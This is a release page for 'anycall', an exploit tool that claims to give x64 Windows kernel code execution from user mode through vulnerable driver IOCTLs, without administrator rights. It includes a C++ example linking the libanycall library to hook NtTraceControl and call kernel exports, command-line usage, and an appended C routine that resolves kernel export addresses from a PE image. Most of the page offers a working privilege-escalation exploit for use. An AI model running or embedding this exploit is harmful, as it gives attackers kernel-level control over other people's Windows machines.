Anycall Versions

x64 Windows kernel code execution from user mode via an arbitrary syscall; demonstration of vulnerable IOCTLs

release_2.0

2 years ago

Release 2.0 includes libanycall, a C++ static library that lets you run the anycall exploit from your own code.

Usage

  1. Link the library (e.g., #pragma comment( lib, "libanycall64" ))
  2. Include the header (e.g., #include "libanycall.h")

For example:

#include <windows.h>
#include <cstdint>
#include <cstdio>
#include <cstdlib>

#include "libanycall.h"

#pragma comment( lib, "libanycall64" )

// function-pointer type matching the prototype of the kernel export we want to call
using PsGetCurrentProcessId = HANDLE( __fastcall* )( void );

int main( const int argc, const char** argv, const char** envp )
{
    // hook ntdll!NtTraceControl and its kernel counterpart as the gateway into the kernel
    if ( !libanycall::init( "ntdll.dll", "NtTraceControl" ) )
    {
        printf( "[!] failed to init libanycall\n" );
        return EXIT_FAILURE;
    }
    
    // invoke NT kernel APIs from usermode; the HANDLE result is narrowed to a PID
    const uint32_t process_id =
        ( uint32_t )( uintptr_t )ANYCALL_INVOKE( PsGetCurrentProcessId );

    printf( "PsGetCurrentProcessId returns %u\n", process_id );

    return EXIT_SUCCESS;
}

release_1.0

3 years ago

Usage

anycall64.exe [module name] [procedure name]

*Administrator privilege is not required to run.

The following arguments are supported:

  • (optional) module name: the user-mode module that exports [procedure name], e.g. ntdll.dll
  • (optional) procedure name: the function to hook; it is resolved in both ntoskrnl and [module name], e.g. NtTraceControl

If not specified, ntdll.dll and NtTraceControl are used.
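The 1.0 usage above resolves the hooked procedure in both ntoskrnl and the user-mode module. The following is an added example, not anycall's own code: it walks the export directory of a PE32+ image laid out as mapped (RVA equals buffer offset), resolves an export by name with a bounds check on every header-supplied offset, and rebases the resulting RVA onto a kernel base. The image is constructed inline with arbitrary RVAs and is not a real ntoskrnl.exe, the kernel base value is hypothetical, and the helper names are my own; how anycall obtains the live kernel base is not described on this page.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PE32PLUS_MAGIC        0x20b
#define OPT_HDR_DATADIR_OFF   112   /* DataDirectory[0] (export table) inside a PE32+ optional header */

static uint16_t rd16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }
static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static void     wr16(uint8_t *p, uint16_t v) { memcpy(p, &v, 2); }
static void     wr32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }

/* Walk the export directory of a PE32+ image that is laid out as mapped
 * (RVA == offset into img) and return the RVA of the export called `name`,
 * or 0 if the image is malformed or has no such export. Every RVA read from
 * the headers is bounds-checked against `len` before it is dereferenced. */
uint32_t pe_export_rva(const uint8_t *img, size_t len, const char *name)
{
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z') return 0;
    size_t nt = rd32(img + 0x3C);                       /* e_lfanew */
    if (nt + 24 + OPT_HDR_DATADIR_OFF + 8 > len) return 0;
    if (memcmp(img + nt, "PE\0\0", 4) != 0) return 0;
    const uint8_t *opt = img + nt + 24;                 /* skip signature + IMAGE_FILE_HEADER */
    if (rd16(opt) != PE32PLUS_MAGIC) return 0;          /* x64 images only */
    size_t exp = rd32(opt + OPT_HDR_DATADIR_OFF);
    if (exp == 0 || exp + 40 > len) return 0;           /* no export table */
    const uint8_t *ed = img + exp;                      /* IMAGE_EXPORT_DIRECTORY */
    uint32_t n_names = rd32(ed + 24);                   /* NumberOfNames */
    size_t   funcs   = rd32(ed + 28);                   /* AddressOfFunctions */
    size_t   names   = rd32(ed + 32);                   /* AddressOfNames */
    size_t   ords    = rd32(ed + 36);                   /* AddressOfNameOrdinals */
    for (uint32_t i = 0; i < n_names; i++) {
        if (names + 4 * (size_t)i + 4 > len || ords + 2 * (size_t)i + 2 > len) return 0;
        size_t name_rva = rd32(img + names + 4 * i);
        if (name_rva >= len) return 0;
        /* names are NUL-terminated in a well-formed image; cap the compare at the buffer end */
        if (strncmp((const char *)img + name_rva, name, len - name_rva) != 0) continue;
        uint16_t ord = rd16(img + ords + 2 * i);        /* index into AddressOfFunctions */
        if (funcs + 4 * (size_t)ord + 4 > len) return 0;
        return rd32(img + funcs + 4 * ord);
    }
    return 0;
}

/* The user-mode copy of ntoskrnl.exe only yields the RVA; the address a hook
 * must target is that RVA added to the live kernel's load address. */
uint64_t kernel_export_address(uint64_t kernel_base, uint32_t rva)
{
    return rva ? kernel_base + rva : 0;
}

/* Constructed test image: headers plus an export table with two names.
 * Not a real ntoskrnl.exe; the function RVAs are arbitrary. */
size_t build_fake_image(uint8_t **out)
{
    const size_t len = 0x400;
    uint8_t *img = calloc(1, len);
    *out = img;
    if (!img) return 0;
    img[0] = 'M'; img[1] = 'Z';
    wr32(img + 0x3C, 0x80);                             /* e_lfanew */
    memcpy(img + 0x80, "PE\0\0", 4);
    wr16(img + 0x84, 0x8664);                           /* IMAGE_FILE_MACHINE_AMD64 */
    wr16(img + 0x84 + 16, 240);                         /* SizeOfOptionalHeader (PE32+) */
    uint8_t *opt = img + 0x98;                          /* 0x80 + 4 + 20 */
    wr16(opt, PE32PLUS_MAGIC);
    wr32(opt + OPT_HDR_DATADIR_OFF, 0x200);             /* export directory RVA */
    wr32(opt + OPT_HDR_DATADIR_OFF + 4, 0x100);         /* export directory size */
    uint8_t *ed = img + 0x200;
    wr32(ed + 20, 2);  wr32(ed + 24, 2);                /* NumberOfFunctions, NumberOfNames */
    wr32(ed + 28, 0x240); wr32(ed + 32, 0x250); wr32(ed + 36, 0x260);
    wr32(img + 0x240, 0x1234); wr32(img + 0x244, 0x2000);   /* function RVAs */
    wr32(img + 0x250, 0x270);  wr32(img + 0x254, 0x290);    /* name RVAs */
    wr16(img + 0x260, 0);      wr16(img + 0x262, 1);        /* name -> function ordinals */
    strcpy((char *)img + 0x270, "NtTraceControl");
    strcpy((char *)img + 0x290, "PsGetCurrentProcessId");
    return len;
}

/* One-shot lookup against the constructed image (hypothetical helper). */
uint32_t fake_image_export_rva(const char *name)
{
    uint8_t *img;
    size_t len = build_fake_image(&img);
    if (!img) return 0;
    uint32_t rva = pe_export_rva(img, len, name);
    free(img);
    return rva;
}

int main(void)
{
    const uint64_t kernel_base = 0xfffff80012340000ULL;  /* hypothetical live kernel base */
    const char *wanted[] = { "NtTraceControl", "PsGetCurrentProcessId", "NoSuchExport" };
    for (size_t i = 0; i < 3; i++) {
        uint32_t rva = fake_image_export_rva(wanted[i]);
        printf("%-22s rva=0x%x kernel=0x%llx\n", wanted[i], rva,
               (unsigned long long)kernel_export_address(kernel_base, rva));
    }
    return 0;
}
```

The same walk works against the real ntoskrnl.exe if it is mapped as an image rather than read as a raw file; with a raw file, each RVA first has to be translated through the section table, which this example deliberately leaves out.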